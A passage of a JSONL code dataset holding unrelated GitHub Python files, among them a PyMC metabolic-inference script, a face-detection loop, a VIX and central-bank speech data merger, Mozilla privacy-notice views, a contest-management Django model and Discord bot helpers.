CKY.initialize_table(l)\r\n\r\n\r\n output.close()\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"KimDodds25/Work-Samples","sub_path":"CKY Parser/Probabilistic CKY/hw4_parser.py","file_name":"hw4_parser.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25217216552","text":"# Code to run the ADVI inference with a near-genome scale model and relative\n# omics data.\n\n# So I've found that for certain hardware (the intel chips on the cluster here,\n# for instance) the intel python and mkl-numpy are about 2x as fast as the\n# openblas versions. You can delete a bunch of this stuff if it doesn't work\n# for you. This example is a lot slower than some of the other ones though, but\n# I guess that's expected\n\nimport os\nos.environ['MKL_THREADING_LAYER'] = 'GNU'\n\nimport pandas as pd\nimport numpy as np\nimport pymc3 as pm\nimport theano.tensor as T\nimport argparse\nimport cobra\nimport emll, gzip, pickle\n\n# Load model and data\nmodel_file = '../models/iJB1325_HP.nonnative_genes.pubchem.flipped.nonzero.reduced.json'\nv_star_file = '../data/Eflux2_flux_rates.flipped.csv'\nx_file = '../data/metabolite_concentrations.csv'\ne_file = '../data/normalized_targeted_enzyme_activities.csv'\nv_file = '../data/Eflux2_flux_rates.flipped.csv'\ny_file = '../data/normalized_external_metabolites.csv'\nref_state = 'SF ABF93_7-R3'\nadvi_file = '../data/A.niger_advi_50k_w_e.pgz'\nn_iterations = 50000\nn_trace = 500\nmodel = cobra.io.load_json_model(model_file)\nr_labels = [r.id for r in model.reactions]\nr_compartments = [\n r.compartments if 'e' not in r.compartments else 't'\n for r in model.reactions\n]\n\n#r_compartments[model.reactions.index('SUCCt2r')] = 'c'\n#r_compartments[model.reactions.index('ACt2r')] = 'c'\n\nfor rxn in model.exchanges:\n r_compartments[model.reactions.index(rxn)] = 't'\n\nm_compartments = [\n m.compartment for m in model.metabolites\n]\n\nv_star = pd.read_csv(v_star_file, index_col=0)[ref_state]\nv_star = v_star[[r.id for r in model.reactions if r.id in v_star.index]]\n#print(v_star <= 0)\nx = pd.read_csv(x_file, index_col=0)\nx = x.loc[[m.id for m in model.metabolites if m.id in x.index]]\nv = pd.read_csv(v_file, index_col=0)\nv = v.loc[[r.id for r in model.reactions]]# if 'e' in r.compartments]]\ne = pd.read_csv(e_file, index_col=0)\ne = e.loc[[r.id for r in model.reactions if r.id in e.index]]\ny = pd.read_csv(y_file, index_col=0)\ny = y.loc[[m.id for m in model.metabolites if m.id in y.index]]\n\n# Drop wild-type\nwild_type = 'SF ABF93_1-R1,SF ABF93_1-R2,SF ABF93_1-R3'.split(',')\n# Reindex arrays to have the same column ordering\nto_consider = [c for c in v.columns if c not in wild_type]\nv = v.loc[:, to_consider]\nx = x.loc[:, to_consider]\ne = e.loc[:, to_consider]\ny = y.loc[:, to_consider]\n\nn_exp = len(to_consider) - 1\n\n\nxn = (x.subtract(x[ref_state], 0) * np.log(2)).T\nen = e.T #(2 ** e.subtract(e[ref_state], 0)).T\nyn = (y.subtract(y[ref_state], 0) * np.log(2)).T\n\n# To calculate vn, we have to merge in the v_star series and do some\n# calculations.\n#v_star_df = pd.DataFrame(v_star).reset_index().rename(columns= {0: 'id', 1:'flux'})\n#v_merge = v.merge(v_star_df, left_index=True, right_on='id').set_index('id')\n#vn = v.divide(v_merge.flux, 0).drop('flux', 1).T\nvn = v.T\n\n# Drop reference state\nvn = vn.drop(index=ref_state)\nxn = xn.drop(index=ref_state)\nen = en.drop(index=ref_state)\nyn = yn.drop(index=ref_state)\n\n# Get indexes for measured values\nx_inds = np.array([model.metabolites.index(met) for met in xn.columns])\ne_inds = np.array([model.reactions.index(rxn) for rxn in en.columns])\nv_inds = np.array([model.reactions.index(rxn) for rxn in vn.columns])\ny_inds = np.array([model.metabolites.index(met) for met in yn.columns])\n\ne_laplace_inds = []\ne_zero_inds = []\n\nfor i, rxn in enumerate(model.reactions):\n if rxn.id not in en.columns:\n if ('e' not in rxn.compartments) and (len(rxn.compartments) == 1):\n e_laplace_inds += [i]\n else:\n e_zero_inds += [i]\n\ne_laplace_inds = np.array(e_laplace_inds)\ne_zero_inds = np.array(e_zero_inds)\ne_indexer = np.hstack([e_inds, e_laplace_inds, e_zero_inds]).argsort()\n\nN = cobra.util.create_stoichiometric_matrix(model)\nEx = emll.util.create_elasticity_matrix(model)\nEy = np.zeros((N.shape[1], 2))\nEy[model.reactions.index('r1046'), 0] = 1\nEy[model.reactions.index('3HPPt'), 1] = -1\n\nEx *= 0.1 + 0.8 * np.random.rand(*Ex.shape)\nprint(\"N: \", N.shape, \"Ex: \", Ex.shape, \"Ey: \", Ey.shape, \"v_star: \", v_star.shape, \"vn: \", vn.shape, \"v: \", v.shape)\nll = emll.LinLogLeastNorm(N, Ex, Ey, v_star.values, driver='gelsy')\n\nnp.random.seed(1)\n\n\n# Define the probability model\nfrom emll.util import initialize_elasticity\n\nwith pm.Model() as pymc_model:\n\n # Priors on elasticity values\n Ex_t = pm.Deterministic('Ex', initialize_elasticity(\n ll.N, b=0.01, sd=1, alpha=None,\n m_compartments=m_compartments,\n r_compartments=r_compartments\n ))\n\n Ey_t = pm.Deterministic('Ey', initialize_elasticity(-Ey.T, 'ey', b=0.05, sd=1, alpha=None))\n yn_t = T.as_tensor_variable(yn.values)\n\n e_measured = pm.Normal('log_e_measured', mu=np.log(en), sd=0.2,\n shape=(n_exp, len(e_inds)))\n e_unmeasured = pm.Laplace('log_e_unmeasured', mu=0, b=0.1,\n shape=(n_exp, len(e_laplace_inds)))\n log_en_t = T.concatenate(\n [e_measured, e_unmeasured,\n T.zeros((n_exp, len(e_zero_inds)))], axis=1)[:, e_indexer]\n\n pm.Deterministic('log_en_t', log_en_t)\n\n # Priors on external concentrations\n # yn_t = pm.Normal('yn_t', mu=0, sd=10, shape=(n_exp, ll.ny),\n # testval=0.1 * np.random.randn(n_exp, ll.ny))\n\n\n chi_ss, vn_ss = ll.steady_state_theano(Ex_t, Ey_t, T.exp(log_en_t), yn_t)\n pm.Deterministic('chi_ss', chi_ss)\n pm.Deterministic('vn_ss', vn_ss)\n log_vn_ss = T.log(T.clip(vn_ss[:, v_inds], 1E-8, 1E8))\n log_vn_ss = T.clip(log_vn_ss, -1.5, 1.5)\n\n print(\"log(vn): \", T.shape(log_vn_ss), \"vn: \", vn.shape)\n chi_clip = T.clip(chi_ss[:, x_inds], -1.5, 1.5)\n\n chi_obs = pm.Normal('chi_obs', mu=chi_clip, sd=0.2,\n observed=xn.clip(lower=-1.5, upper=1.5))\n log_vn_obs = pm.Normal('vn_obs', mu=log_vn_ss, sd=0.1,\n observed=np.log(vn).clip(lower=-1.5, upper=1.5))\n\nwith gzip.open('../data/model.pz', 'wb') as f:\n pickle.dump(pymc_model, f)\n\n\nwith gzip.open('../data/model_data.pz', 'wb') as f:\n pickle.dump({\n 'model': model,\n 'vn': vn,\n 'en': en,\n 'yn': yn,\n 'xn': xn,\n 'x_inds': x_inds,\n 'e_inds': e_inds,\n 'v_inds': v_inds,\n #'m_labels': m_labels,\n 'r_labels': r_labels,\n 'll': ll,\n 'v_star': v_star\n }\n , f)\n\n\n\nif __name__ == \"__main__\":\n\n\n with pymc_model:\n #trace_prior = pm.sample_prior_predictive(samples=50)\n approx = pm.ADVI()\n hist = approx.fit(\n n=n_iterations,\n obj_optimizer=pm.adagrad_window(learning_rate=0.005),\n total_grad_norm_constraint=100\n )\n\n trace = hist.sample(n_trace)\n ppc = pm.sample_ppc(trace)\n\n import gzip\n import pickle\n with gzip.open(advi_file, 'wb') as f:\n pickle.dump({'approx': approx,\n 'hist': hist,\n 'trace': trace,\n # 'trace_prior': trace_prior\n }, f)\n","repo_name":"AgileBioFoundry/AspergillusQ4Milestone","sub_path":"src/run_inference.py","file_name":"run_inference.py","file_ext":"py","file_size_in_byte":7011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"34705615996","text":"#easy-level problem\n#Given an array of integers nums and an integer target, \n#return indices of the two numbers such that they add up to target.\n\n# brute force solution (~500ms)\ndef twoSum(nums, target):\n result = [0,0]\n for i in range(len(nums)):\n for m in range(i+1, len(nums)):\n if nums[i] + nums[m] == target:\n result[0] = i\n result[1] = m\n return result\n\nd = {0:3, 1:3}\nprint(twoSum([2,7,11,15], 9))\nprint(twoSum([3,2,4], 6))\nprint(twoSum([3,3], 6))","repo_name":"nhanduong288/LeetCode_Solutions","sub_path":"twoSum.py","file_name":"twoSum.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"14366924113","text":"'''Projeto 1 - Python'''\n\n#Advinhe o número Python (Computador)\n\nimport random as rd\n\ndef Joga_Dado(): # Função para jogar o dado\n dado = rd.randint(1,100)\n return dado\n\ndef Adivinhar_Número(dado): #Função para adivinhar o número\n a = int(input('Tente adivinhar o número do dado de 1 a 100: '))\n if a == dado:\n print('\\nParabéns! Você acertou\\n')\n else:\n print('Voce errou! Tente denovo.')\n Adivinhar_Número(dado)\n \n\ndef Chama_Menu():\n print(f'''Esse é meu primeiro projeto em Python. Bem-vindo :)\n\nPara iniciar o jogo digite 1.\nPara sair do jogo digite 2.''')\n decisao = int(input()) #INPUT DO PRINT ACIMA\n if decisao == 1:\n pass #prosseguir para o código\n elif decisao == 2:\n exit(print('Obrigado! =)'))\n else:\n print('Não entendi') #CHAMAR NOVAMENTE O MENU\n Chama_Menu()\n\n\n#LOOP DE MENU DO CÓDIGO\nwhile True:\n Chama_Menu()\n dado = Joga_Dado()\n Adivinhar_Número(dado)","repo_name":"gustavowinter1/1ProjetoPorDia","sub_path":"Primeiro projeto em Python - Adivinhe o número.py","file_name":"Primeiro projeto em Python - Adivinhe o número.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"27854726583","text":"from picamera.array import PiRGBArray\nfrom picamera import PiCamera\n\nimport cv2\n\ncamera = PiCamera()\ncamera.resolution = (640, 480)\ncamera.framerate = 32\nrawCapture = PiRGBArray(camera, size=(640, 480))\n\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\n\nfor frame in camera.capture_continuous(rawCapture, format='bgr',\n use_video_port=True):\n image = frame.array\n gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n faces = face_cascade.detectMultiScale(gray_image,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30, 30),\n flags=cv2.CASCADE_SCALE_IMAGE)\n\n print(\"Found {0} faces.\".format(len(faces)))\n\n for (x, y, w, h) in faces:\n cv2.rectangle(image, (x, y), (x+w, y+h), (0, 0, 255), 2)\n center_point = ((x+(x+w))/2, (y+(y+h))/2)\n cv2.rectangle(image, center_point, center_point, (255, 0, 0), 2)\n\n cv2.imshow(\"Faces\", image)\n rawCapture.truncate(0)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncamera.release()\ncv2.destroyAllWindows()\n","repo_name":"CoroBot/SparkSoftware","sub_path":"OpenCV/face_tracker/face_identify_picamera.py","file_name":"face_identify_picamera.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"28853144298","text":"import os\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nfrom datetime import timedelta\ndf_market = pd.read_csv('completed_vix_archive_formatted.csv')\ndirectory = \"./bis_speeches_tables_2/\"\ndata = {\n \"DATE\": [],\n \"ARTICLE\": [],\n \"Diff_VIX_1d\": [],\n \"Diff_VIX_1w\": [],\n \"Diff_VIX_2w\": [],\n \"date1w\": [],\n \"date2w\": []\n}\n\n'''\n\ndate1_2w = {\n \"date1w\": [],\n \n \"date2w\": []\n \n}\n'''\n\n#df_market[\"Diff_VIX_1w\"] = np.nan\n\nstored_df = pd.DataFrame(data)\n#df1_2w = pd.DataFrame(date1_2w)\n\n\nfor filename in os.listdir(directory):\n df_file = pd.read_csv(directory + filename)\n mergedDF = pd.merge(df_file, df_market, on=['DATE'], how='inner')\n # print(df_file.columns)\n # if(df_market['DATE'].isin(df_file['DATE']).value_counts()):\n # print(\"true\")\n stored_df = stored_df.append(mergedDF)\n #print(\"merged\")\nstored_df[\"Diff_VIX_1d\"] = stored_df[\"CLOSE\"]\n#print(\"1d values added\")\n # df_1w = np.where(stored_df['DATE'] == (df_market['DATE']))\n\n\n\nprint(\"oneweeklist and twoweek created\")\n\n\nprint(stored_df.head(5))\n\n#stored_df['Diff_VIX_1w'] = stored_df['OPEN'].where(stored_df['date1w'] == stored_df['DATE'])\none_w = timedelta(weeks = 1)\ntwo_w = timedelta(weeks = 2)\nstored_df['DATE'] = pd.to_datetime(stored_df['DATE'])\nstored_df['date1w'] = stored_df['DATE'] + one_w\nstored_df['date2w'] = stored_df['DATE'] + two_w\n#stored_df['date1w'] = pd.to_datetime(stored_df['date1w'])\n#stored_df['date2w'] = pd.to_datetime(stored_df['date2w'])\nstored_df = stored_df.sort_values(by='DATE')\nsize = len(stored_df.index)\nw1_rows = 0\nw2_rows = 0\nprint(stored_df.tail(5))\nfinaldf=pd.DataFrame(data)\ni=0\nfor index, row in stored_df.iterrows():\n os.system('clear')\n print('processing row',i,'outof',size)\n #this logic is inefficient but I am too lazy to fix it, due to repeating articles\n #print('number of rows with 1w',w1_rows)\n #print('number of rows with 2w',w2_rows)\n #print(finaldf.head(5))\n #check = datetime.now()\n for index2, row2 in stored_df.iterrows():\n if row2['DATE'] == row['date1w']:\n # if(row2['DATE'] == check):\n # pass\n #else:\n row['Diff_VIX_1w'] = row2['OPEN']\n #check = row['Diff_VIX_1w']\n w1_rows += 1\n # check = row2['DATE']\n #print(row)\n #print(\"1w matched\")\n \n if row2['DATE'] == row['date2w']:\n row['Diff_VIX_2w'] = row2['OPEN']\n #print(\"2w matched\")\n w2_rows += 1\n break\n finaldf = finaldf.append(row)\n i += 1\n\nprint('table completed')\n\n\n'''\nnow = datetime.now()\n\ndate_time = now.strftime(\"%m/%d/%Y, %H:%M:%S\")\n\ndate= str(date_time)\n'''\n\n#print(stored_df.head(5))\nfinaldf.to_csv(\"merged_finance_1w_2w\"+\".csv\", mode='a', index=False, header=True)\n\n","repo_name":"AnushaChattoHeidelberg/PredictFinancialMarketsByAnalyzingSpeechByCentralBanksAnalyzing","sub_path":"src/snippets/data_work/finance_article_compilation.py","file_name":"finance_article_compilation.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"70792879677","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\nimport re\n\nfrom django.views.decorators.cache import cache_page\n\nfrom commonware.response.decorators import xframe_allow\nfrom bs4 import BeautifulSoup\n\nfrom lib import l10n_utils\n\nfrom bedrock.legal_docs.views import LegalDocView, load_legal_doc\n\n\nHN_PATTERN = re.compile(r'^h(\\d)$')\nHREF_PATTERN = re.compile(r'^https?\\:\\/\\/www\\.mozilla\\.org')\n\n\ndef process_legal_doc(content):\n \"\"\"\n Load a static Markdown file and return the document as a BeautifulSoup\n object for easier manipulation.\n\n :param content: HTML Content of the legal doc.\n \"\"\"\n soup = BeautifulSoup(content)\n\n # Manipulate the markup\n for section in soup.find_all('section'):\n level = 0\n header = soup.new_tag('header')\n div = soup.new_tag('div')\n\n section.insert(0, header)\n section.insert(1, div)\n\n # Append elements to
or
\n for tag in section.children:\n if not tag.name:\n continue\n match = HN_PATTERN.match(tag.name)\n if match:\n header.append(tag)\n level = int(match.group(1))\n if tag.name == 'p':\n (header if level == 1 else div).append(tag)\n if tag.name in ['ul', 'hr']:\n div.append(tag)\n\n if level > 3:\n section.parent.div.append(section)\n\n # Remove empty
s\n if len(div.contents) == 0:\n div.extract()\n\n # Convert the site's full URLs to absolute paths\n for link in soup.find_all(href=HREF_PATTERN):\n link['href'] = HREF_PATTERN.sub('', link['href'])\n\n # Return the HTML fragment as a BeautifulSoup object\n return soup\n\n\nclass PrivacyDocView(LegalDocView):\n def get_legal_doc(self):\n doc = super(PrivacyDocView, self).get_legal_doc()\n doc['content'] = process_legal_doc(doc['content'])\n return doc\n\n\nclass FirefoxPrivacyDocView(PrivacyDocView):\n template_name = 'privacy/notices/firefox.html'\n\n def get_legal_doc(self):\n doc = super(FirefoxPrivacyDocView, self).get_legal_doc()\n if len(doc['content'].select('.privacy-header-firefox')) > 0:\n self.template_name = 'privacy/notices/firefox-quantum.html'\n return doc\n\n\nclass FirefoxCliqzPrivacyDocView(PrivacyDocView):\n template_name = 'privacy/notices/firefox-cliqz.html'\n\n def get_legal_doc(self):\n doc = super(FirefoxCliqzPrivacyDocView, self).get_legal_doc()\n if len(doc['content'].select('.privacy-header-firefox')) > 0:\n self.template_name = 'privacy/notices/firefox-cliqz-quantum.html'\n return doc\n\n\nfirefox_notices = FirefoxPrivacyDocView.as_view(\n legal_doc_name='firefox_privacy_notice')\n\nfirefox_os_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/firefox-os.html',\n legal_doc_name='firefox_os_privacy_notice')\n\nfirefox_cliqz_notices = FirefoxCliqzPrivacyDocView.as_view(\n legal_doc_name='firefox-cliqz_privacy_notice')\n\nfirefox_cloud_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/firefox-cloud.html',\n legal_doc_name='firefox_cloud_services_PrivacyNotice')\n\nfirefox_hello_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/firefox-hello.html',\n legal_doc_name='WebRTC_PrivacyNotice')\n\nfirefox_focus_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/firefox-focus.html',\n legal_doc_name='focus_privacy_notice')\n\nfirefox_rocket_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/firefox-rocket.html',\n legal_doc_name='rocket_privacy_notice')\n\nthunderbird_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/thunderbird.html',\n legal_doc_name='thunderbird_privacy_policy')\n\nwebsites_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/websites.html',\n legal_doc_name='websites_privacy_notice')\n\nfacebook_notices = PrivacyDocView.as_view(\n template_name='privacy/notices/facebook.html',\n legal_doc_name='facebook_privacy_info')\nfacebook_notices = xframe_allow(facebook_notices)\n\n\n@cache_page(60 * 60) # cache for 1 hour\ndef privacy(request):\n doc = load_legal_doc('mozilla_privacy_policy', l10n_utils.get_locale(request))\n\n template_vars = {\n 'doc': process_legal_doc(doc['content']),\n 'localized': doc['localized'],\n 'translations': doc['translations'],\n }\n\n return l10n_utils.render(request, 'privacy/index.html', template_vars)\n","repo_name":"CodehubX/Mozilla","sub_path":"bedrock/privacy/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"70428933436","text":"from analysis_by_rid import by_record_identifier;\nfrom analysis_by_rid_llen import by_recordID_and_line_length;\nfrom analysis_manual import manual_selection;\n\ndef analysis_menu_selection(analysis_options):\n user_input = '';\n\n input_message = \"Pick an option:\\n\";\n\n for key, (descriptor, _) in analysis_options.items():\n input_message += f'{key}) {descriptor}\\n';\n\n input_message += 'Your choice: ';\n\n while user_input not in analysis_options.keys():\n user_input = input(input_message);\n\n print('You picked: ' + analysis_options[user_input][0]);\n return analysis_options[user_input];\n\ndef analysis(content):\n analysis_options = {\n '1': ('Only by record identifier', by_record_identifier),\n '2': ('By record identifier and line length', by_recordID_and_line_length),\n '3': ('Manual analysis', manual_selection),\n }\n\n analysis_choice = analysis_menu_selection(analysis_options);\n\n return analysis_choice[1](content);\n","repo_name":"agustinruiz/logfix","sub_path":"src/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"5538459682","text":"# vim:ts=4:sts=4:sw=4:expandtab\n\nfrom django.db import models\n\nfrom satori.ars.server import server_info\nfrom satori.core.dbev import Events\n\nfrom satori.core.models import Entity\n\nAlreadyRegistered = DefineException('AlreadyRegistered', 'The specified user \\'{login}\\' is already registered',\n [('login', unicode, False)])\n\n@ExportModel\nclass Contest(Entity):\n \"\"\"Model. Description of a contest.\n\n rights:\n APPLY\n JOIN\n OBSERVE\n \"\"\"\n parent_entity = models.OneToOneField(Entity, parent_link=True, related_name='cast_contest')\n\n name = models.CharField(max_length=64, unique=True)\n description = models.TextField(blank=True, default=\"\")\n problems = models.ManyToManyField('Problem', through='ProblemMapping', related_name='contests')\n contestant_role = models.ForeignKey('SystemRole', related_name='contest_contestants+', on_delete=models.PROTECT)\n admin_role = models.ForeignKey('SystemRole', related_name='contest_admins+', on_delete=models.PROTECT)\n printer = models.ForeignKey('Printer', related_name='contests', on_delete=models.SET_NULL, null=True)\n archived = models.BooleanField(default=False)\n\n lock_start = models.DateTimeField(null=True)\n lock_finish = models.DateTimeField(null=True)\n lock_address = models.IPAddressField(default='0.0.0.0')\n lock_netmask = models.IPAddressField(default='255.255.255.255')\n\n appearance = AttributeGroupField(PCArg('self', 'VIEW'), PCArg('self', 'MANAGE'), '')\n\n class ExportMeta(object):\n fields = [('name', 'VIEW'), ('description', 'VIEW'), ('contestant_role', 'MANAGE'), ('admin_role', 'MANAGE'), ('printer', 'MANAGE'), ('archived', 'VIEW'), ('lock_start', 'MANAGE'), ('lock_finish', 'MANAGE'), ('lock_address', 'MANAGE'), ('lock_netmask', 'MANAGE')]\n\n class RightsMeta(object):\n rights = ['APPLY', 'JOIN', 'SUBMIT', 'ASK_QUESTIONS', 'VIEW_SUBMIT_CONTENTS', 'VIEW_SUBMIT_RESULTS', 'PERMIT_BACKUP', 'PERMIT_PRINT']\n\n inherit_APPLY = ['JOIN']\n inherit_JOIN = ['MANAGE']\n inherit_SUBMIT = ['MANAGE']\n inherit_ASK_QUESTIONS = ['MANAGE']\n inherit_VIEW_SUBMIT_CONTENTS = ['MANAGE']\n inherit_VIEW_SUBMIT_RESULTS = ['MANAGE']\n inherit_PERMIT_BACKUP = ['MANAGE']\n inherit_PERMIT_PRINT = ['MANAGE']\n\n @classmethod\n def inherit_rights(cls):\n inherits = super(Contest, cls).inherit_rights()\n cls._inherit_add(inherits, 'APPLY', 'id', 'JOIN')\n cls._inherit_add(inherits, 'JOIN', 'id', 'MANAGE')\n cls._inherit_add(inherits, 'SUBMIT', 'id', 'MANAGE')\n cls._inherit_add(inherits, 'OBSERVE', 'id', 'MANAGE')\n cls._inherit_add(inherits, 'VIEW_TASKS', 'id', 'MANAGE')\n cls._inherit_add(inherits, 'ASK_QUESTIONS', 'id', 'MANAGE')\n cls._inherit_add(inherits, 'VIEW_INTRA_FILES', 'id', 'MANAGE')\n return inherits\n\n def save(self, *args, **kwargs):\n self.fixup_appearance()\n super(Contest, self).save(*args, **kwargs)\n\n def __str__(self):\n return self.name\n # TODO: add presentation options\n\n @ExportMethod(DjangoStruct('Contest'), [], PCPermit())\n @staticmethod\n def get_current_lock():\n contests = Contest.objects.filter(lock_start__lte=datetime.now(), lock_finish__gte=datetime.now())\n contests = [contest for contest in contests\n if (ipaddr.IPv4Address(server_info.client_ip) in ipaddr.IPv4Network(contest.lock_address + '/' + contest.lock_netmask))\n ]\n \n if len(contests) == 0:\n return None\n if len(contests) > 1:\n raise Contest.MultipleObjectsReturned()\n else:\n return contests[0]\n \n @ExportMethod(DjangoStruct('Contest'), [DjangoStruct('Contest')], PCGlobal('MANAGE_CONTESTS'), [CannotSetField])\n @staticmethod\n def create(fields):\n contest = Contest()\n contest.forbid_fields(fields, ['id', 'contestant_role', 'admin_role'])\n if not Privilege.global_demand('MANAGE_LOCKS'):\n contest.forbid_fields(fields, ['lock_start', 'lock_finish', 'lock_address', 'lock_netmask'])\n contest.update_fields(fields, ['name', 'description', 'printer', 'archived', 'lock_start', 'lock_finish', 'lock_address', 'lock_netmask'])\n contest.contestant_role = SystemRole.create(fields=SystemRoleStruct(name='Contestants of ' + contest.name))\n contest.admin_role = SystemRole.create(fields=SystemRoleStruct(name='Administrators of ' + contest.name))\n contest.save()\n contest.add_admin(token_container.token.user)\n Global.get_instance().contest_admins.add_member(contest.admin_role)\n Privilege.grant(contest.admin_role, contest, 'MANAGE')\n Privilege.grant(contest.admin_role, contest.admin_role, 'MANAGE')\n Privilege.grant(contest.admin_role, contest.contestant_role, 'MANAGE')\n Privilege.grant(contest.contestant_role, contest, 'VIEW')\n return contest\n \n @ExportMethod(DjangoStruct('Contest'), [DjangoId('Contest'), DjangoStruct('Contest')], PCArg('self', 'MANAGE'), [CannotSetField])\n def modify(self, fields):\n self.forbid_fields(fields, ['id', 'contestant_role', 'admin_role'])\n if not Privilege.global_demand('MANAGE_LOCKS'):\n self.forbid_fields(fields, ['lock_start', 'lock_finish', 'lock_address', 'lock_netmask'])\n modified = self.update_fields(fields, ['name', 'description', 'printer', 'archived', 'lock_start', 'lock_finish', 'lock_address', 'lock_netmask'])\n self.save()\n if 'name' in modified:\n self.contestant_role.modify(fields=SystemRoleStruct(name='Contestants of ' + self.name))\n self.admin_role.modify(fields=SystemRoleStruct(name='Administrators of ' + self.name))\n self.changed()\n return self\n\n @ExportMethod(NoneType, [DjangoId('Contest')], PCArg('self', 'MANAGE'), [CannotDeleteObject])\n def delete(self):\n try:\n admin_role = self.admin_role\n contestant_role = self.contestant_role\n for ranking in self.rankings.all():\n ranking.stop()\n super(Contest, self).delete()\n admin_role.delete()\n contestant_role.delete()\n except models.ProtectedError as e:\n raise CannotDeleteObject()\n\n @ExportMethod(NoneType, [DjangoId('Contest')], PCAnd(PCArg('self', 'MANAGE'), PCGlobal('MANAGE_LOCKS')))\n def disable_lock(self):\n self.lock_start = None\n self.lock_finish = None\n self.lock_address = '0.0.0.0'\n self.lock_netmask = '255.255.255.255'\n self.save()\n \n def changed(self):\n RawEvent().send(Event(type='checking_changed_contest', id=self.id))\n\n def changed_contestants(self):\n RawEvent().send(Event(type='checking_changed_contestants', id=self.id))\n\n @ExportMethod(DjangoStruct('Contestant'), [DjangoId('Contest'), DjangoId('Role')], PCOr(PCTokenUser('user'), PCArg('self', 'MANAGE')))\n def find_contestant(self, user):\n try:\n return Contestant.objects.get(contest=self, children__id=user.id)\n except Contestant.DoesNotExist:\n try:\n return Contestant.objects.get(contest=self, id=user.id)\n except Contestant.DoesNotExist:\n return None\n\n @ExportMethod(DjangoStruct('Contestant'), [DjangoId('Contest')], PCAnd(PCTokenIsUser(), PCArg('self', 'APPLY')), [AlreadyRegistered])\n def join(self):\n return Contestant.create(fields=ContestantStruct(contest=self, accepted=bool(Privilege.demand(self, 'JOIN'))), user_list=[token_container.token.user])\n\n @ExportMethod(NoneType, [DjangoId('Contest'), DjangoId('User')], PCArg('self', 'MANAGE'))\n def add_admin(self, user):\n contestant = self.find_contestant(user)\n if contestant is None:\n contestant = Contestant.create(fields=ContestantStruct(contest=self, accepted=True, invisible=True), user_list=[user])\n else:\n contestant.modify(fields=ContestantStruct(accepted=True, invisible=True))\n self.admin_role.add_member(contestant)\n self.changed_contestants()\n\n @ExportMethod(NoneType, [DjangoId('Contest'), DjangoId('Role')], PCArg('self', 'MANAGE'))\n def delete_admin(self, role):\n contestant = self.find_contestant(role)\n if contestant is not None:\n self.admin_role.delete_member(contestant)\n contestant.modify(fields=ContestantStruct(invisible=False))\n\nclass ContestEvents(Events):\n model = Contest\n on_insert = on_update = ['name']\n on_delete = []\n","repo_name":"TFKls/satori-git","sub_path":"satori.core/satori/core/entities/Contest.py","file_name":"Contest.py","file_ext":"py","file_size_in_byte":8602,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"6949606785","text":"import nextcord as discord\nfrom nextcord.ext import commands\nimport re\nimport json\n\n\ndef clean_code(content) -> str:\n if content.startswith(\"```\") and content.endswith(\"```\"):\n return \"\\n\".join(content.split(\"\\n\")[1:])[:-3]\n return content\n\n\ndef read_json(file) -> dict:\n with open(f\"{file}\", \"r\") as f:\n data = json.load(f)\n return data\n\n\ndef write_json(file, data):\n with open(file, \"w\") as f:\n json.dump(data, f, indent=4)\n\n\ntime_regex = re.compile(\"(?:(\\d{1,5})(h|s|m|d))+?\")\ntime_dict = {\"h\": 3600, \"s\": 1, \"m\": 60, \"d\": 86400}\n\n\nclass TimeConverter(commands.Converter):\n async def convert(self, ctx, argument):\n args = argument.lower()\n matches = re.findall(time_regex, args)\n time = 0\n for key, value in matches:\n try:\n time += time_dict[value] * float(key)\n except KeyError:\n raise commands.BadArgument(f\"{value} is an invalid time key\")\n except ValueError:\n raise commands.BadArgument(f\"{key} is not a number\")\n return time\n\n\nclass walbankconverter(commands.Converter):\n async def convert(self, ctx: commands.Context, argument: str):\n if argument.lower() == \"wallet\":\n arg = argument.lower()\n elif argument.lower() == \"bank\":\n arg = argument.lower()\n else:\n raise commands.BadArgument(\n \"Didn't specify whether it was wallet or bank properly\"\n )\n\n return arg\n\n\nclass statusconverter(commands.Converter):\n async def convert(self, ctx, argument: str):\n if argument.lower() == \"idle\":\n return discord.Status.idle\n elif argument.lower() == \"dnd\" or argument.lower() == \"do not disturb\":\n return discord.Status.dnd\n elif argument.lower() == \"invisible\":\n return discord.Status.invisible\n elif argument.lower() == \"online\":\n return discord.Status.online\n else:\n raise commands.BadArgument(\"Didn't specify the status 